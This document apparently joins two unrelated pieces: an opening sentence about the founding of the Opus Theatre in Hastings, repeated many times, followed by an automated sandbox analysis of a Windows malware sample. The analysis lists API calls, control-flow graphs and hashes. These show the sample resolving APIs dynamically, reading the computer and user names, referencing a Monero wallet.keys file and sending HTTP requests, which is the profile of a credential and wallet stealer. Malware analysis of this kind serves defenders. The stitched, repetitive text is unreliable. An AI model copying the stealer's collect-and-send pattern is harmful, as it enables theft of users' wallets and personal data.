Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: 5ebace756687896666dd40f4425e807e7e10d5c542b9374ecaa73d3b423f3c1f
                    • Instruction ID: b8fb7015d1995c40c75974fe1928753319325907d2352396aae2477e7e3cbc95
                    • Opcode Fuzzy Hash: 5ebace756687896666dd40f4425e807e7e10d5c542b9374ecaa73d3b423f3c1f
                    • Instruction Fuzzy Hash: 39413728FD268C6AC734FBA589EEE9D73D35F4A704F5050C4AE2253293CBB0650047B6
                    Function 00BC4880 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479networkstringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 801 bc4880-bc4942 call bda7a0 call bc47b0 call bda740 * 5 InternetOpenA StrCmpCA 816 bc494b-bc494f 801->816 817 bc4944 801->817 818 bc4ecb-bc4ef3 InternetCloseHandle call bdaad0 call bc9ac0 816->818 819 bc4955-bc4acd call bd8b60 call bda920 call bda8a0 call bda800 * 2 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda920 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda920 call bda8a0 call bda800 * 2 InternetConnectA 816->819 817->816 829 bc4ef5-bc4f2d call bda820 call bda9b0 call bda8a0 call bda800 818->829 830 bc4f32-bc4fa2 call bd8990 * 2 call bda7a0 call bda800 * 8 818->830 819->818 905 bc4ad3-bc4ad7 819->905 829->830 906 bc4ad9-bc4ae3 905->906 907 bc4ae5 905->907 908 bc4aef-bc4b22 HttpOpenRequestA 906->908 907->908 909 bc4ebe-bc4ec5 InternetCloseHandle 908->909 910 bc4b28-bc4e28 call bda9b0 call bda8a0 call bda800 call bda920 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda920 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda920 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda9b0 call bda8a0 call bda800 call bda920 call bda8a0 call bda800 call bda740 call bda920 * 2 call bda8a0 call bda800 * 2 call bdaad0 lstrlen call bdaad0 * 2 lstrlen call bdaad0 HttpSendRequestA 908->910 909->818 1021 bc4e32-bc4e5c InternetReadFile 910->1021 1022 bc4e5e-bc4e65 1021->1022 1023 bc4e67-bc4eb9 InternetCloseHandle call bda800 1021->1023 1022->1023 1024 bc4e69-bc4ea7 call bda9b0 call bda8a0 call bda800 1022->1024 1023->909 1024->1021
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                      • Part of subcall function 00BC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BC4915
                    • StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC4ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00BE0DDB,00000000,?,?,00000000,?,",00000000,?,013CEA48), ref: 00BC4DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BC4E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BC4E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BC4E49
                    • InternetCloseHandle.WININET(00000000), ref: 00BC4EAD
                    • InternetCloseHandle.WININET(00000000), ref: 00BC4EC5
                    • HttpOpenRequestA.WININET(00000000,013CEA18,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC4B15
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • InternetCloseHandle.WININET(00000000), ref: 00BC4ECF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------$de-DE
                    • API String ID: 460715078-1932956479
                    • Opcode ID: dfca944423403a9a136e75405b38861f87654e0910df38c24a3c16eaadb8cf38
                    • Instruction ID: 29d7799ec638c26bed051fb17e9916ae7352c95e952ad2cb440b9b2366b9c72f
                    • Opcode Fuzzy Hash: dfca944423403a9a136e75405b38861f87654e0910df38c24a3c16eaadb8cf38
                    • Instruction Fuzzy Hash: 1812FB71910258AADB15EB90DCA2FEEF3B8AF14300F5041EAB50672191EF752F49CF66
                    Function 00BD78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD7917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00BD792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: e1be05b54c7224dd7c4f3fb5192b8b20607fe20903b4b755d22da84ed34a24f6
                    • Instruction ID: 5c42d4eac2b93cbe2066d4241644b16d2cdbd253704f38935266394995df3389
                    • Opcode Fuzzy Hash: e1be05b54c7224dd7c4f3fb5192b8b20607fe20903b4b755d22da84ed34a24f6
                    • Instruction Fuzzy Hash: CE0162B2944309EFC704DF95DD49BAEFBF8F704B11F10426AE545A2380E77959448BA1
                    Function 00BD7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BC11B7), ref: 00BD7880
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD7887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BD789F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: 4b66dd1176f0df59df9d719bfa1074a01786d03708e4f6e41178d3f55a92cd80
                    • Instruction ID: 3c9c06617812140fdd95215dc9d8b85dc015bb13fba8d9f7dd02a7ef08a64eba
                    • Opcode Fuzzy Hash: 4b66dd1176f0df59df9d719bfa1074a01786d03708e4f6e41178d3f55a92cd80
                    • Instruction Fuzzy Hash: 78F04FB1944208AFC704DF99DD49BAEFBB8EB04711F10426AFA05A2780D77515448BA1
                    Function 00BC1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: 8bbdeaea0f9bc1d17f8f87e736be0924ff6225c3e1908a04bc400be84ac9c47f
                    • Instruction ID: 353643eaaaa1c641700ef65da15daea263a1092d739eb9b581144c104087409e
                    • Opcode Fuzzy Hash: 8bbdeaea0f9bc1d17f8f87e736be0924ff6225c3e1908a04bc400be84ac9c47f
                    • Instruction Fuzzy Hash: C9D05E7490030CDFCB00DFE1D849AEDBBB8FB08311F0805A9D90572340EA3154C5CAA6
                    Function 00BD9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 633 bd9c10-bd9c1a 634 bda036-bda0ca LoadLibraryA * 8 633->634 635 bd9c20-bda031 GetProcAddress * 43 633->635 636 bda0cc-bda141 GetProcAddress * 5 634->636 637 bda146-bda14d 634->637 635->634 636->637 638 bda216-bda21d 637->638 639 bda153-bda211 GetProcAddress * 8 637->639 640 bda21f-bda293 GetProcAddress * 5 638->640 641 bda298-bda29f 638->641 639->638 640->641 642 bda2a5-bda332 GetProcAddress * 6 641->642 643 bda337-bda33e 641->643 642->643 644 bda41f-bda426 643->644 645 bda344-bda41a GetProcAddress * 9 643->645 646 bda428-bda49d GetProcAddress * 5 644->646 647 bda4a2-bda4a9 644->647 645->644 646->647 648 bda4dc-bda4e3 647->648 649 bda4ab-bda4d7 GetProcAddress * 2 647->649 650 bda515-bda51c 648->650 651 bda4e5-bda510 GetProcAddress * 2 648->651 649->648 652 bda612-bda619 650->652 653 bda522-bda60d GetProcAddress * 10 650->653 651->650 654 bda67d-bda684 652->654 655 bda61b-bda678 GetProcAddress * 4 652->655 653->652 656 bda69e-bda6a5 654->656 657 bda686-bda699 GetProcAddress 654->657 655->654 658 bda708-bda709 656->658 659 bda6a7-bda703 GetProcAddress * 4 656->659 657->656 659->658
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,013B5B30), ref: 00BD9C2D
                    • GetProcAddress.KERNEL32(74DD0000,013B5C90), ref: 00BD9C45
                    • GetProcAddress.KERNEL32(74DD0000,013C94C0), ref: 00BD9C5E
                    • GetProcAddress.KERNEL32(74DD0000,013C94F0), ref: 00BD9C76
                    • GetProcAddress.KERNEL32(74DD0000,013C9508), ref: 00BD9C8E
                    • GetProcAddress.KERNEL32(74DD0000,013C9538), ref: 00BD9CA7
                    • GetProcAddress.KERNEL32(74DD0000,013BBA90), ref: 00BD9CBF
                    • GetProcAddress.KERNEL32(74DD0000,013CD0C8), ref: 00BD9CD7
                    • GetProcAddress.KERNEL32(74DD0000,013CD0E0), ref: 00BD9CF0
                    • GetProcAddress.KERNEL32(74DD0000,013CD008), ref: 00BD9D08
                    • GetProcAddress.KERNEL32(74DD0000,013CCDF8), ref: 00BD9D20
                    • GetProcAddress.KERNEL32(74DD0000,013B5CB0), ref: 00BD9D39
                    • GetProcAddress.KERNEL32(74DD0000,013B5CD0), ref: 00BD9D51
                    • GetProcAddress.KERNEL32(74DD0000,013B5CF0), ref: 00BD9D69
                    • GetProcAddress.KERNEL32(74DD0000,013B5D10), ref: 00BD9D82
                    • GetProcAddress.KERNEL32(74DD0000,013CCEA0), ref: 00BD9D9A
                    • GetProcAddress.KERNEL32(74DD0000,013CCEE8), ref: 00BD9DB2
                    • GetProcAddress.KERNEL32(74DD0000,013BB950), ref: 00BD9DCB
                    • GetProcAddress.KERNEL32(74DD0000,013B5D30), ref: 00BD9DE3
                    • GetProcAddress.KERNEL32(74DD0000,013CCE88), ref: 00BD9DFB
                    • GetProcAddress.KERNEL32(74DD0000,013CCE58), ref: 00BD9E14
                    • GetProcAddress.KERNEL32(74DD0000,013CD020), ref: 00BD9E2C
                    • GetProcAddress.KERNEL32(74DD0000,013CCF00), ref: 00BD9E44
                    • GetProcAddress.KERNEL32(74DD0000,013B5D70), ref: 00BD9E5D
                    • GetProcAddress.KERNEL32(74DD0000,013CCF18), ref: 00BD9E75
                    • GetProcAddress.KERNEL32(74DD0000,013CD098), ref: 00BD9E8D
                    • GetProcAddress.KERNEL32(74DD0000,013CCEB8), ref: 00BD9EA6
                    • GetProcAddress.KERNEL32(74DD0000,013CCED0), ref: 00BD9EBE
                    • GetProcAddress.KERNEL32(74DD0000,013CCE10), ref: 00BD9ED6
                    • GetProcAddress.KERNEL32(74DD0000,013CCFF0), ref: 00BD9EEF
                    • GetProcAddress.KERNEL32(74DD0000,013CCE70), ref: 00BD9F07
                    • GetProcAddress.KERNEL32(74DD0000,013CCE28), ref: 00BD9F1F
                    • GetProcAddress.KERNEL32(74DD0000,013CCF30), ref: 00BD9F38
                    • GetProcAddress.KERNEL32(74DD0000,013CA540), ref: 00BD9F50
                    • GetProcAddress.KERNEL32(74DD0000,013CCF48), ref: 00BD9F68
                    • GetProcAddress.KERNEL32(74DD0000,013CCF60), ref: 00BD9F81
                    • GetProcAddress.KERNEL32(74DD0000,013B5D50), ref: 00BD9F99
                    • GetProcAddress.KERNEL32(74DD0000,013CD0B0), ref: 00BD9FB1
                    • GetProcAddress.KERNEL32(74DD0000,013B56B0), ref: 00BD9FCA
                    • GetProcAddress.KERNEL32(74DD0000,013CCF78), ref: 00BD9FE2
                    • GetProcAddress.KERNEL32(74DD0000,013CD038), ref: 00BD9FFA
                    • GetProcAddress.KERNEL32(74DD0000,013B59F0), ref: 00BDA013
                    • GetProcAddress.KERNEL32(74DD0000,013B5770), ref: 00BDA02B
                    • LoadLibraryA.KERNEL32(013CCF90,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA03D
                    • LoadLibraryA.KERNEL32(013CCFA8,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA04E
                    • LoadLibraryA.KERNEL32(013CCE40,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA060
                    • LoadLibraryA.KERNEL32(013CCFC0,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA072
                    • LoadLibraryA.KERNEL32(013CCFD8,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA083
                    • LoadLibraryA.KERNEL32(013CD050,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA095
                    • LoadLibraryA.KERNEL32(013CD068,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA0A7
                    • LoadLibraryA.KERNEL32(013CD080,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA0B8
                    • GetProcAddress.KERNEL32(75290000,013B5870), ref: 00BDA0DA
                    • GetProcAddress.KERNEL32(75290000,013CD380), ref: 00BDA0F2
                    • GetProcAddress.KERNEL32(75290000,013C8F28), ref: 00BDA10A
                    • GetProcAddress.KERNEL32(75290000,013CD158), ref: 00BDA123
                    • GetProcAddress.KERNEL32(75290000,013B59D0), ref: 00BDA13B
                    • GetProcAddress.KERNEL32(73B70000,013BB928), ref: 00BDA160
                    • GetProcAddress.KERNEL32(73B70000,013B5A10), ref: 00BDA179
                    • GetProcAddress.KERNEL32(73B70000,013BB680), ref: 00BDA191
                    • GetProcAddress.KERNEL32(73B70000,013CD290), ref: 00BDA1A9
                    • GetProcAddress.KERNEL32(73B70000,013CD2F0), ref: 00BDA1C2
                    • GetProcAddress.KERNEL32(73B70000,013B5790), ref: 00BDA1DA
                    • GetProcAddress.KERNEL32(73B70000,013B58D0), ref: 00BDA1F2
                    • GetProcAddress.KERNEL32(73B70000,013CD1D0), ref: 00BDA20B
                    • GetProcAddress.KERNEL32(752C0000,013B5A30), ref: 00BDA22C
                    • GetProcAddress.KERNEL32(752C0000,013B5A50), ref: 00BDA244
                    • GetProcAddress.KERNEL32(752C0000,013CD2A8), ref: 00BDA25D
                    • GetProcAddress.KERNEL32(752C0000,013CD320), ref: 00BDA275
                    • GetProcAddress.KERNEL32(752C0000,013B5A90), ref: 00BDA28D
                    • GetProcAddress.KERNEL32(74EC0000,013BB978), ref: 00BDA2B3
                    • GetProcAddress.KERNEL32(74EC0000,013BB6A8), ref: 00BDA2CB
                    • GetProcAddress.KERNEL32(74EC0000,013CD170), ref: 00BDA2E3
                    • GetProcAddress.KERNEL32(74EC0000,013B59B0), ref: 00BDA2FC
                    • GetProcAddress.KERNEL32(74EC0000,013B57F0), ref: 00BDA314
                    • GetProcAddress.KERNEL32(74EC0000,013BB6D0), ref: 00BDA32C
                    • GetProcAddress.KERNEL32(75BD0000,013CD398), ref: 00BDA352
                    • GetProcAddress.KERNEL32(75BD0000,013B5750), ref: 00BDA36A
                    • GetProcAddress.KERNEL32(75BD0000,013C8F38), ref: 00BDA382
                    • GetProcAddress.KERNEL32(75BD0000,013CD338), ref: 00BDA39B
                    • GetProcAddress.KERNEL32(75BD0000,013CD140), ref: 00BDA3B3
                    • GetProcAddress.KERNEL32(75BD0000,013B56D0), ref: 00BDA3CB
                    • GetProcAddress.KERNEL32(75BD0000,013B5810), ref: 00BDA3E4
                    • GetProcAddress.KERNEL32(75BD0000,013CD200), ref: 00BDA3FC
                    • GetProcAddress.KERNEL32(75BD0000,013CD218), ref: 00BDA414
                    • GetProcAddress.KERNEL32(75A70000,013B5730), ref: 00BDA436
                    • GetProcAddress.KERNEL32(75A70000,013CD278), ref: 00BDA44E
                    • GetProcAddress.KERNEL32(75A70000,013CD3B0), ref: 00BDA466
                    • GetProcAddress.KERNEL32(75A70000,013CD3C8), ref: 00BDA47F
                    • GetProcAddress.KERNEL32(75A70000,013CD1E8), ref: 00BDA497
                    • GetProcAddress.KERNEL32(75450000,013B5710), ref: 00BDA4B8
                    • GetProcAddress.KERNEL32(75450000,013B57B0), ref: 00BDA4D1
                    • GetProcAddress.KERNEL32(75DA0000,013B57D0), ref: 00BDA4F2
                    • GetProcAddress.KERNEL32(75DA0000,013CD350), ref: 00BDA50A
                    • GetProcAddress.KERNEL32(6F070000,013B5A70), ref: 00BDA530
                    • GetProcAddress.KERNEL32(6F070000,013B56F0), ref: 00BDA548
                    • GetProcAddress.KERNEL32(6F070000,013B5830), ref: 00BDA560
                    • GetProcAddress.KERNEL32(6F070000,013CD230), ref: 00BDA579
                    • GetProcAddress.KERNEL32(6F070000,013B5850), ref: 00BDA591
                    • GetProcAddress.KERNEL32(6F070000,013B5890), ref: 00BDA5A9
                    • GetProcAddress.KERNEL32(6F070000,013B58B0), ref: 00BDA5C2
                    • GetProcAddress.KERNEL32(6F070000,013B58F0), ref: 00BDA5DA
                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00BDA5F1
                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00BDA607
                    • GetProcAddress.KERNEL32(75AF0000,013CD368), ref: 00BDA629
                    • GetProcAddress.KERNEL32(75AF0000,013C8F68), ref: 00BDA641
                    • GetProcAddress.KERNEL32(75AF0000,013CD2C0), ref: 00BDA659
                    • GetProcAddress.KERNEL32(75AF0000,013CD3E0), ref: 00BDA672
                    • GetProcAddress.KERNEL32(75D90000,013B5910), ref: 00BDA693
                    • GetProcAddress.KERNEL32(6E360000,013CD188), ref: 00BDA6B4
                    • GetProcAddress.KERNEL32(6E360000,013B5930), ref: 00BDA6CD
                    • GetProcAddress.KERNEL32(6E360000,013CD0F8), ref: 00BDA6E5
                    • GetProcAddress.KERNEL32(6E360000,013CD110), ref: 00BDA6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
